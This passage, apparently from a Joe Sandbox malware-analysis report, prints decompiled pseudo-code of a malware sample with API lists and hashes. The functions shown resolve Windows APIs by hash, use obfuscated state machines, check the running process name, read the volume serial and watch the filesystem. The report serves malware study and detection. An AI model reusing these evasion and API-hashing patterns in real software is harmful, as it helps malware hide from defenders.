                                                                                                      						if( *0x20bdef0 == 0) {
                                                                                                      							 *0x20bdef0 = E020B3DD0(0, E020B3E70(0xbb51e2dc), 0x3a73900, _t46);
                                                                                                      						}
                                                                                                      						_t43 =  *0x20be33c;
                                                                                                      						if(_t43 == 0) {
                                                                                                      							_t43 = E020B3DD0(0, E020B3E70(0xbb51e2dc), 0xf01f7005, _t46);
                                                                                                      							 *0x20be33c = _t43;
                                                                                                      						}
                                                                                                      						 *_t43(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
                                                                                                      						_t7 = 0x3a02c02;
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					goto L20;
                                                                                                      					L5:
                                                                                                      				} while (_t7 != 0x1b4988ea);
                                                                                                      				return 0;
                                                                                                      				goto L20;
                                                                                                      			}












                                                                                                      0x020b9c40
                                                                                                      0x020b9c46
                                                                                                      0x020b9c4e
                                                                                                      0x020b9c50
                                                                                                      0x020b9c50
                                                                                                      0x020b9c50
                                                                                                      0x020b9c50
                                                                                                      0x020b9c55
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b9c57
                                                                                                      0x020b9c85
                                                                                                      0x020b9c8c
                                                                                                      0x020b9c9f
                                                                                                      0x020b9ca4
                                                                                                      0x020b9ca4
                                                                                                      0x020b9cb8
                                                                                                      0x020b9cba
                                                                                                      0x00000000
                                                                                                      0x020b9c59
                                                                                                      0x020b9c5e
                                                                                                      0x020b9c7e
                                                                                                      0x00000000
                                                                                                      0x020b9c60
                                                                                                      0x020b9c65
                                                                                                      0x020b9d42
                                                                                                      0x020b9d5a
                                                                                                      0x020b9d5a
                                                                                                      0x020b9d6c
                                                                                                      0x020b9d76
                                                                                                      0x020b9d83
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b9c65
                                                                                                      0x020b9c5e
                                                                                                      0x00000000
                                                                                                      0x020b9c57
                                                                                                      0x020b9cc6
                                                                                                      0x00000000
                                                                                                      0x020b9cc8
                                                                                                      0x020b9cce
                                                                                                      0x020b9cd8
                                                                                                      0x020b9cf2
                                                                                                      0x020b9cf2
                                                                                                      0x020b9cf8
                                                                                                      0x020b9d00
                                                                                                      0x020b9d18
                                                                                                      0x020b9d1a
                                                                                                      0x020b9d1a
                                                                                                      0x020b9d2f
                                                                                                      0x020b9d31
                                                                                                      0x00000000
                                                                                                      0x020b9d31
                                                                                                      0x00000000
                                                                                                      0x020b9c6b
                                                                                                      0x020b9c6b
                                                                                                      0x020b9c7d
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 020B9D2C
                                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 020B9D2F
                                                                                                      • lstrcmpiW.KERNELBASE(?,?), ref: 020B9D6C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 3605714105-0
                                                                                                      • Opcode ID: ce6dfbb5a5963ca689cfd712ff8233d708845cafb4ce8ea52a6de266f6b6c576
                                                                                                      • Instruction ID: 251563fd91ac65461b69fc063cef794eaa5dee8f294caa3671fc80ce148679f2
                                                                                                      • Opcode Fuzzy Hash: ce6dfbb5a5963ca689cfd712ff8233d708845cafb4ce8ea52a6de266f6b6c576
                                                                                                      • Instruction Fuzzy Hash: 5E31C4757043088BE777AB6494957EA32D7AF94350F10082AE629CB380DA74EC44AFA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 722 20b5430-20b5444 723 20b5461-20b546f 722->723 724 20b5446-20b545c call 20b3e70 call 20b3dd0 722->724 729 20b54d3-20b54dc 723->729 730 20b5471-20b547b 723->730 724->723 732 20b547d 730->732 733 20b5497-20b549e 730->733 734 20b5480-20b5484 732->734 735 20b54bb-20b54d1 GetVolumeInformationW 733->735 736 20b54a0-20b54b6 call 20b3e70 call 20b3dd0 733->736 738 20b5491-20b5493 734->738 739 20b5486-20b548d 734->739 735->729 736->735 738->733 739->734 741 20b548f 739->741 741->733
                                                                                                      C-Code - Quality: 68%
                                                                                                      			E020B5430(void* __ebx, void* __ebp) {
                                                                                                      				char _v520;
                                                                                                      				short _v528;
                                                                                                      				long _v532;
                                                                                                      				intOrPtr* _t7;
                                                                                                      				short* _t10;
                                                                                                      				WCHAR** _t28;
                                                                                                      
                                                                                                      				_t27 = __ebp;
                                                                                                      				_t16 = __ebx;
                                                                                                      				_t7 =  *0x20be19c;
                                                                                                      				 *_t28 = 0;
                                                                                                      				if(_t7 == 0) {
                                                                                                      					_t7 = E020B3DD0(__ebx, E020B3E70(0xbb51e2dc), 0x414e6c3b, __ebp);
                                                                                                      					 *0x20be19c = _t7;
                                                                                                      				}
                                                                                                      				_push(0x104);
                                                                                                      				_push( &_v520);
                                                                                                      				if( *_t7() != 0) {
                                                                                                      					_t10 =  &_v528;
                                                                                                      					if(_v528 != 0) {
                                                                                                      						while( *_t10 != 0x5c) {
                                                                                                      							_t10 = _t10 + 2;
                                                                                                      							if( *_t10 != 0) {
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      							}
                                                                                                      							goto L9;
                                                                                                      						}
                                                                                                      						 *((short*)(_t10 + 2)) = 0;
                                                                                                      					}
                                                                                                      					L9:
                                                                                                      					if( *0x20bdd4c == 0) {
                                                                                                      						 *0x20bdd4c = E020B3DD0(_t16, E020B3E70(0xbb51e2dc), 0xa8c6cb77, _t27);
                                                                                                      					}
                                                                                                      					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
                                                                                                      				}
                                                                                                      				return _v532;
                                                                                                      			}









                                                                                                      0x020b5430
                                                                                                      0x020b5430
                                                                                                      0x020b5436
                                                                                                      0x020b543b
                                                                                                      0x020b5444
                                                                                                      0x020b5457
                                                                                                      0x020b545c
                                                                                                      0x020b545c
                                                                                                      0x020b5461
                                                                                                      0x020b546a
                                                                                                      0x020b546f
                                                                                                      0x020b5477
                                                                                                      0x020b547b
                                                                                                      0x020b5480
                                                                                                      0x020b5486
                                                                                                      0x020b548d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b548f
                                                                                                      0x00000000
                                                                                                      0x020b548d
                                                                                                      0x020b5493
                                                                                                      0x020b5493
                                                                                                      0x020b5497
                                                                                                      0x020b549e
                                                                                                      0x020b54b6
                                                                                                      0x020b54b6
                                                                                                      0x020b54d1
                                                                                                      0x020b54d1
                                                                                                      0x020b54dc

                                                                                                      APIs
                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 020B54D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationVolume
                                                                                                      • String ID: ;lNA
                                                                                                      • API String ID: 2039140958-679641461
                                                                                                      • Opcode ID: bb098b73669d163445d43c1fd115ed7cdb394d21ece05645c5e3a414bb8da774
                                                                                                      • Instruction ID: 8a5f38bd44d82cc4ff57d62f0b4f4e8357cb71d752b103093a56e15a433b4cbe
                                                                                                      • Opcode Fuzzy Hash: bb098b73669d163445d43c1fd115ed7cdb394d21ece05645c5e3a414bb8da774
                                                                                                      • Instruction Fuzzy Hash: C51182306503009BE336DB64CC52BF676E1BF85708F9488ADE6559B2C0FBB8D844DB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 66%
                                                                                                      			E020B5B30(void* __ecx, void* __edx, void* __ebp) {
                                                                                                      				intOrPtr _v0;
                                                                                                      				intOrPtr _v4;
                                                                                                      				void* __ebx;
                                                                                                      				intOrPtr* _t3;
                                                                                                      				void* _t6;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				void* _t20;
                                                                                                      				void* _t21;
                                                                                                      				void* _t38;
                                                                                                      				void* _t39;
                                                                                                      				void* _t40;
                                                                                                      				void* _t41;
                                                                                                      
                                                                                                      				_t42 = __ebp;
                                                                                                      				_t3 =  *0x20bddc8;
                                                                                                      				_t20 = __ecx;
                                                                                                      				_t38 = __edx;
                                                                                                      				if(_t3 == 0) {
                                                                                                      					_t3 = E020B3DD0(_t20, E020B3E70(0xbb51e2dc), 0x298e8809, __ebp);
                                                                                                      					 *0x20bddc8 = _t3;
                                                                                                      				}
                                                                                                      				_t40 =  *_t3();
                                                                                                      				if( *0x20bdcf0 == 0) {
                                                                                                      					 *0x20bdcf0 = E020B3DD0(_t20, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t42);
                                                                                                      				}
                                                                                                      				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
                                                                                                      				_t41 = _t6;
                                                                                                      				if(_t41 == 0) {
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					_push(_t41);
                                                                                                      					_push(_v0);
                                                                                                      					_push(_v4);
                                                                                                      					_t21 = E020B57F0(_t20, _t38);
                                                                                                      					_t9 =  *0x20bddc8;
                                                                                                      					if(_t9 == 0) {
                                                                                                      						_t9 = E020B3DD0(_t21, E020B3E70(0xbb51e2dc), 0x298e8809, _t42);
                                                                                                      						 *0x20bddc8 = _t9;
                                                                                                      					}
                                                                                                      					_t39 =  *_t9();
                                                                                                      					if( *0x20bdbec == 0) {
                                                                                                      						 *0x20bdbec = E020B3DD0(_t21, E020B3E70(0xbb51e2dc), 0x632f374, _t42);
                                                                                                      					}
                                                                                                      					RtlFreeHeap(_t39, 0, _t41); // executed
                                                                                                      					return _t21;
                                                                                                      				}
                                                                                                      			}















                                                                                                      0x020b5b30
                                                                                                      0x020b5b30
                                                                                                      0x020b5b36
                                                                                                      0x020b5b3a
                                                                                                      0x020b5b3e
                                                                                                      0x020b5b51
                                                                                                      0x020b5b56
                                                                                                      0x020b5b56
                                                                                                      0x020b5b5d
                                                                                                      0x020b5b66
                                                                                                      0x020b5b7e
                                                                                                      0x020b5b7e
                                                                                                      0x020b5b8b
                                                                                                      0x020b5b8d
                                                                                                      0x020b5b91
                                                                                                      0x020b5c07
                                                                                                      0x020b5b93
                                                                                                      0x020b5b93
                                                                                                      0x020b5b94
                                                                                                      0x020b5b9c
                                                                                                      0x020b5ba5
                                                                                                      0x020b5baa
                                                                                                      0x020b5bb1
                                                                                                      0x020b5bc4
                                                                                                      0x020b5bc9
                                                                                                      0x020b5bc9
                                                                                                      0x020b5bd0
                                                                                                      0x020b5bd9
                                                                                                      0x020b5bf1
                                                                                                      0x020b5bf1
                                                                                                      0x020b5bfa
                                                                                                      0x020b5c01
                                                                                                      0x020b5c01

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 020B5B8B
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 020B5BFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2488874121-0
                                                                                                      • Opcode ID: 53c0c17b24b9daf6f9aae8058756e415435d962dad53a0602a5f5e1ee6b139c4
                                                                                                      • Instruction ID: d64f0fe99d04ff38c4a4c9431d9df66a7d45d034e27b60f76b661e77e948fa41
                                                                                                      • Opcode Fuzzy Hash: 53c0c17b24b9daf6f9aae8058756e415435d962dad53a0602a5f5e1ee6b139c4
                                                                                                      • Instruction Fuzzy Hash: 2C118E64B413019BA77BABB96C50BEB66DBBFC5390F240879F514CB380EA74CC116B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 775 20b99e0-20b99f6 776 20b9a00-20b9a05 775->776 777 20b9a0b 776->777 778 20b9b17-20b9b1c 776->778 781 20b9aa1-20b9aa8 call 20b9c40 777->781 782 20b9a11-20b9a16 777->782 779 20b9b22-20b9b27 778->779 780 20b9bb4-20b9bcb 778->780 788 20b9b29-20b9b30 779->788 789 20b9b9c-20b9ba1 779->789 783 20b9be8-20b9bf9 780->783 784 20b9bcd-20b9be3 call 20b3e70 call 20b3dd0 780->784 805 20b9aaa-20b9ab2 781->805 806 20b9ae6-20b9aed 781->806 785 20b9c0b-20b9c12 782->785 786 20b9a1c-20b9a21 782->786 809 20b9c32-20b9c3c 783->809 815 20b9bfb-20b9c06 783->815 784->783 794 20b9c2f 785->794 795 20b9c14-20b9c2a call 20b3e70 call 20b3dd0 785->795 791 20b9a23-20b9a28 786->791 792 20b9a35-20b9a3c 786->792 796 20b9b4d-20b9b5a FindFirstChangeNotificationW call 20b9c40 788->796 797 20b9b32-20b9b48 call 20b3e70 call 20b3dd0 788->797 789->776 798 20b9ba7-20b9bb1 789->798 791->789 800 20b9a2e-20b9a33 791->800 802 20b9a59-20b9a6e 792->802 803 20b9a3e-20b9a54 call 20b3e70 call 20b3dd0 792->803 794->809 795->794 813 20b9b5f-20b9b61 796->813 797->796 800->776 835 20b9a8b-20b9a9c 802->835 836 20b9a70-20b9a86 call 20b3e70 call 20b3dd0 802->836 803->802 816 20b9ad2-20b9ae1 805->816 817 20b9ab4-20b9acc call 20b3e70 call 20b3dd0 805->817 810 20b9b0a 806->810 811 20b9aef-20b9b05 call 20b3e70 call 20b3dd0 806->811 822 20b9b0d-20b9b12 810->822 811->810 813->822 823 20b9b63-20b9b6a 813->823 815->776 816->776 817->816 822->776 831 20b9b6c-20b9b82 call 20b3e70 call 20b3dd0 823->831 832 20b9b87-20b9b97 823->832 831->832 832->776 835->776 836->835
                                                                                                      C-Code - Quality: 60%
                                                                                                      			E020B99E0() {
                                                                                                      				short _v520;
                                                                                                      				void* _v524;
                                                                                                      				void* _v528;
                                                                                                      				char _v532;
                                                                                                      				void* _t11;
                                                                                                      				intOrPtr _t12;
                                                                                                      				intOrPtr* _t14;
                                                                                                      				void* _t21;
                                                                                                      				intOrPtr* _t23;
                                                                                                      				intOrPtr* _t29;
                                                                                                      				intOrPtr _t32;
                                                                                                      				intOrPtr* _t36;
                                                                                                      				intOrPtr* _t39;
                                                                                                      				intOrPtr* _t41;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr* _t59;
                                                                                                      				intOrPtr _t63;
                                                                                                      				void* _t79;
                                                                                                      				void* _t80;
                                                                                                      				void* _t82;
                                                                                                      
                                                                                                      				_t79 = _v528;
                                                                                                      				_t11 = 0x22f2bd75;
                                                                                                      				while(1) {
                                                                                                      					_t82 = _t11 - 0x23a0a70b;
                                                                                                      					if(_t82 > 0) {
                                                                                                      						goto L20;
                                                                                                      					}
                                                                                                      					L2:
                                                                                                      					if(_t82 == 0) {
                                                                                                      						if(E020B9C40(_t80) == 0) {
                                                                                                      							_t29 =  *0x20bdc28; // 0x0
                                                                                                      							if(_t29 == 0) {
                                                                                                      								_t29 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0xea5feb8b, _t80);
                                                                                                      								 *0x20bdc28 = _t29;
                                                                                                      							}
                                                                                                      							 *_t29(_t79);
                                                                                                      							L19:
                                                                                                      							_t11 = 0x2d20085c;
                                                                                                      						} else {
                                                                                                      							_t59 =  *0x20be078; // 0x0
                                                                                                      							if(_t59 == 0) {
                                                                                                      								_t59 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x3177b0b4, _t80);
                                                                                                      								 *0x20be078 = _t59;
                                                                                                      							}
                                                                                                      							_t32 =  *0x20be36c; // 0x53be38
                                                                                                      							 *_t59( *((intOrPtr*)(_t32 + 0x40)));
                                                                                                      							_t11 = 0x4875501;
                                                                                                      						}
                                                                                                      						continue;
                                                                                                      					} else {
                                                                                                      						if(_t11 == 0x4875501) {
                                                                                                      							_t36 =  *0x20bdb80; // 0x0
                                                                                                      							if(_t36 == 0) {
                                                                                                      								_t36 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x7fee42b6, _t80);
                                                                                                      								 *0x20bdb80 = _t36;
                                                                                                      							}
                                                                                                      							 *_t36(_t79);
                                                                                                      							L37:
                                                                                                      							return 0;
                                                                                                      						} else {
                                                                                                      							if(_t11 == 0x19f03bdd) {
                                                                                                      								_t39 =  *0x20be028;
                                                                                                      								if(_t39 == 0) {
                                                                                                      									_t39 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x2bebef82, _t80);
                                                                                                      									 *0x20be028 = _t39;
                                                                                                      								}
                                                                                                      								 *_t39(0,  &_v520, 0x104);
                                                                                                      								_t41 =  *0x20bdfcc;
                                                                                                      								if(_t41 == 0) {
                                                                                                      									_t41 = E020B3DD0(_t45, E020B3E70(0x755194fe), 0x1fe39dbe, _t80);
                                                                                                      									 *0x20bdfcc = _t41;
                                                                                                      								}
                                                                                                      								 *((short*)( *_t41( &_v532))) = 0;
                                                                                                      								_t11 = 0x3a6d57a2;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t11 == 0x22f2bd75) {
                                                                                                      									_t11 = 0x19f03bdd;
                                                                                                      									continue;
                                                                                                      									do {
                                                                                                      										while(1) {
                                                                                                      											_t82 = _t11 - 0x23a0a70b;
                                                                                                      											if(_t82 > 0) {
                                                                                                      												goto L20;
                                                                                                      											}
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										goto L20;
                                                                                                      									} while (_t11 != 0x378c9d4d);
                                                                                                      									return 0;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					L38:
                                                                                                      					L20:
                                                                                                      					if(_t11 == 0x2d20085c) {
                                                                                                      						_t12 =  *0x20be36c; // 0x53be38
                                                                                                      						_v528 =  *(_t12 + 0x40);
                                                                                                      						_t14 =  *0x20be2bc;
                                                                                                      						_v524 = _t79;
                                                                                                      						if(_t14 == 0) {
                                                                                                      							_t14 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x54c7591c, _t80);
                                                                                                      							 *0x20be2bc = _t14;
                                                                                                      						}
                                                                                                      						_push(0xffffffff);
                                                                                                      						_push(0);
                                                                                                      						_push( &_v528);
                                                                                                      						_push(2);
                                                                                                      						if( *_t14() == 0) {
                                                                                                      							goto L37;
                                                                                                      						} else {
                                                                                                      							_t11 =  ==  ? 0x23a0a70b : 0x2d20085c;
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(_t11 != 0x3a6d57a2) {
                                                                                                      							goto L28;
                                                                                                      						} else {
                                                                                                      							if( *0x20be1a8 == 0) {
                                                                                                      								 *0x20be1a8 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x194c4dc9, _t80);
                                                                                                      							}
                                                                                                      							_t21 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
                                                                                                      							_t79 = _t21;
                                                                                                      							if(E020B9C40(_t80) == 0) {
                                                                                                      								goto L19;
                                                                                                      							} else {
                                                                                                      								_t23 =  *0x20be078; // 0x0
                                                                                                      								if(_t23 == 0) {
                                                                                                      									_t23 = E020B3DD0(_t45, E020B3E70(0xbb51e2dc), 0x3177b0b4, _t80);
                                                                                                      									 *0x20be078 = _t23;
                                                                                                      								}
                                                                                                      								_t63 =  *0x20be36c; // 0x53be38
                                                                                                      								 *_t23( *((intOrPtr*)(_t63 + 0x40)));
                                                                                                      								_t11 = 0x4875501;
                                                                                                      							}
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L38;
                                                                                                      				}
                                                                                                      			}























                                                                                                      0x020b99e7
                                                                                                      0x020b99eb
                                                                                                      0x020b9a00
                                                                                                      0x020b9a00
                                                                                                      0x020b9a05
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b9a0b
                                                                                                      0x020b9a0b
                                                                                                      0x020b9aa8
                                                                                                      0x020b9ae6
                                                                                                      0x020b9aed
                                                                                                      0x020b9b00
                                                                                                      0x020b9b05
                                                                                                      0x020b9b05
                                                                                                      0x020b9b0b
                                                                                                      0x020b9b0d
                                                                                                      0x020b9b0d
                                                                                                      0x020b9aaa
                                                                                                      0x020b9aaa
                                                                                                      0x020b9ab2
                                                                                                      0x020b9aca
                                                                                                      0x020b9acc
                                                                                                      0x020b9acc
                                                                                                      0x020b9ad2
                                                                                                      0x020b9ada
                                                                                                      0x020b9adc
                                                                                                      0x020b9adc
                                                                                                      0x00000000
                                                                                                      0x020b9a11
                                                                                                      0x020b9a16
                                                                                                      0x020b9c0b
                                                                                                      0x020b9c12
                                                                                                      0x020b9c25
                                                                                                      0x020b9c2a
                                                                                                      0x020b9c2a
                                                                                                      0x020b9c30
                                                                                                      0x020b9c33
                                                                                                      0x020b9c3c
                                                                                                      0x020b9a1c
                                                                                                      0x020b9a21
                                                                                                      0x020b9a35
                                                                                                      0x020b9a3c
                                                                                                      0x020b9a4f
                                                                                                      0x020b9a54
                                                                                                      0x020b9a54
                                                                                                      0x020b9a65
                                                                                                      0x020b9a67
                                                                                                      0x020b9a6e
                                                                                                      0x020b9a81
                                                                                                      0x020b9a86
                                                                                                      0x020b9a86
                                                                                                      0x020b9a94
                                                                                                      0x020b9a97
                                                                                                      0x00000000
                                                                                                      0x020b9a23
                                                                                                      0x020b9a28
                                                                                                      0x020b9a2e
                                                                                                      0x020b9a33
                                                                                                      0x020b9a00
                                                                                                      0x020b9a00
                                                                                                      0x020b9a00
                                                                                                      0x020b9a05
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b9a05
                                                                                                      0x00000000
                                                                                                      0x020b9a00
                                                                                                      0x020b9bb1
                                                                                                      0x020b9bb1
                                                                                                      0x020b9a28
                                                                                                      0x020b9a21
                                                                                                      0x020b9a16
                                                                                                      0x00000000
                                                                                                      0x020b9b17
                                                                                                      0x020b9b1c
                                                                                                      0x020b9bb4
                                                                                                      0x020b9bbc
                                                                                                      0x020b9bc0
                                                                                                      0x020b9bc5
                                                                                                      0x020b9bcb
                                                                                                      0x020b9bde
                                                                                                      0x020b9be3
                                                                                                      0x020b9be3
                                                                                                      0x020b9be8
                                                                                                      0x020b9bea
                                                                                                      0x020b9bf0
                                                                                                      0x020b9bf1
                                                                                                      0x020b9bf9
                                                                                                      0x00000000
                                                                                                      0x020b9bfb
                                                                                                      0x020b9c03
                                                                                                      0x00000000
                                                                                                      0x020b9c03
                                                                                                      0x020b9b22
                                                                                                      0x020b9b27
                                                                                                      0x00000000
                                                                                                      0x020b9b29
                                                                                                      0x020b9b30
                                                                                                      0x020b9b48
                                                                                                      0x020b9b48
                                                                                                      0x020b9b56
                                                                                                      0x020b9b58
                                                                                                      0x020b9b61
                                                                                                      0x00000000
                                                                                                      0x020b9b63
                                                                                                      0x020b9b63
                                                                                                      0x020b9b6a
                                                                                                      0x020b9b7d
                                                                                                      0x020b9b82
                                                                                                      0x020b9b82
                                                                                                      0x020b9b87
                                                                                                      0x020b9b90
                                                                                                      0x020b9b92
                                                                                                      0x020b9b92
                                                                                                      0x00000000
                                                                                                      0x020b9b61
                                                                                                      0x020b9b27
                                                                                                      0x00000000
                                                                                                      0x020b9b1c

                                                                                                      APIs
                                                                                                      • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 020B9B56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ChangeFindFirstNotification
                                                                                                      • String ID:
                                                                                                      • API String ID: 1065410024-0
                                                                                                      • Opcode ID: 8ba0cd93520dbf17f6283462b381a98bd78e543273c7044211dbd6df7e728dbf
                                                                                                      • Instruction ID: 49d209478fa263a8cd80c0a60d8a80fa6eeef91dd204000b8574a52b5b062476
                                                                                                      • Opcode Fuzzy Hash: 8ba0cd93520dbf17f6283462b381a98bd78e543273c7044211dbd6df7e728dbf
                                                                                                      • Instruction Fuzzy Hash: 3F5189347543049BEB3B9B7494A4AEA32D7BF85344B244869E615DB390EA34DC40EF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 66%
                                                                                                      			E020B8330(void* __ebx, void* __ebp) {
                                                                                                      				short _v524;
                                                                                                      				char _v564;
                                                                                                      				char _v572;
                                                                                                      				signed int _v576;
                                                                                                      				struct _SECURITY_ATTRIBUTES* _v584;
                                                                                                      				signed int _v588;
                                                                                                      				signed int _v592;
                                                                                                      				signed int _v596;
                                                                                                      				intOrPtr _v600;
                                                                                                      				intOrPtr _v604;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				intOrPtr* _t51;
                                                                                                      				intOrPtr* _t54;
                                                                                                      				void* _t62;
                                                                                                      				intOrPtr* _t67;
                                                                                                      				void* _t69;
                                                                                                      				void* _t71;
                                                                                                      				void* _t72;
                                                                                                      				void* _t73;
                                                                                                      				void* _t74;
                                                                                                      				void* _t75;
                                                                                                      				intOrPtr _t93;
                                                                                                      				void* _t95;
                                                                                                      				void* _t96;
                                                                                                      				signed int _t97;
                                                                                                      				intOrPtr _t99;
                                                                                                      				void* _t100;
                                                                                                      				void* _t103;
                                                                                                      
                                                                                                      				_t100 = __ebp;
                                                                                                      				_t75 = __ebx;
                                                                                                      				_v588 = 0xe3c6;
                                                                                                      				_t97 = 0x15db38c2;
                                                                                                      				_v588 = _v588 * 0x2c;
                                                                                                      				_v588 = _v588 ^ 0x00272688;
                                                                                                      				_v576 = 0x6801;
                                                                                                      				_v576 = _v576 >> 4;
                                                                                                      				_v576 = _v576 ^ 0x00000681;
                                                                                                      				_t96 = _v588;
                                                                                                      				_v592 = 0x14c9;
                                                                                                      				_v592 = _v592 << 7;
                                                                                                      				_v592 = _v592 * 0x49;
                                                                                                      				_v592 = _v592 ^ 0x02f6a883;
                                                                                                      				_v596 = 0xb2d6;
                                                                                                      				_v596 = _v596 << 0x10;
                                                                                                      				_v596 = _v596 + 0x78e;
                                                                                                      				_v596 = _v596 ^ 0xb2d6078e;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t103 = _t97 - 0x1de4fdf5;
                                                                                                      						if(_t103 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t103 == 0) {
                                                                                                      							_t51 =  *0x20be348;
                                                                                                      							__eflags = _t51;
                                                                                                      							if(_t51 == 0) {
                                                                                                      								_t73 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0xdd2e2440;
                                                                                                      								_t51 = E020B3DD0(_t75, _t73, 0xdd2e2440, _t100);
                                                                                                      								 *0x20be348 = _t51;
                                                                                                      							}
                                                                                                      							 *_t51(_t96, 0,  &_v564, 0x28);
                                                                                                      							asm("sbb esi, esi");
                                                                                                      							_t54 =  *0x20bde38;
                                                                                                      							_t97 = (_t97 & 0xdb3de512) + 0x39234310;
                                                                                                      							__eflags = _t54;
                                                                                                      							if(_t54 == 0) {
                                                                                                      								_t72 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0x76fc23ac;
                                                                                                      								_t54 = E020B3DD0(_t75, _t72, 0x76fc23ac, _t100);
                                                                                                      								 *0x20bde38 = _t54;
                                                                                                      							}
                                                                                                      							 *_t54(_t96);
                                                                                                      							goto L15;
                                                                                                      						} else {
                                                                                                      							if(_t97 == 0xb7daed6) {
                                                                                                      								_v588 = 0xa8c00;
                                                                                                      								_v584 = 0;
                                                                                                      								_v604 = E020BB510(_v588, _v584, 0x989680, 0);
                                                                                                      								_v600 = _t93;
                                                                                                      								_t95 = _v588 - _v564;
                                                                                                      								_t99 = _v604;
                                                                                                      								asm("sbb ecx, [esp+0x3c]");
                                                                                                      								__eflags = _v584 - _v600;
                                                                                                      								if(__eflags < 0) {
                                                                                                      									goto L16;
                                                                                                      								} else {
                                                                                                      									if(__eflags > 0) {
                                                                                                      										L29:
                                                                                                      										return 1;
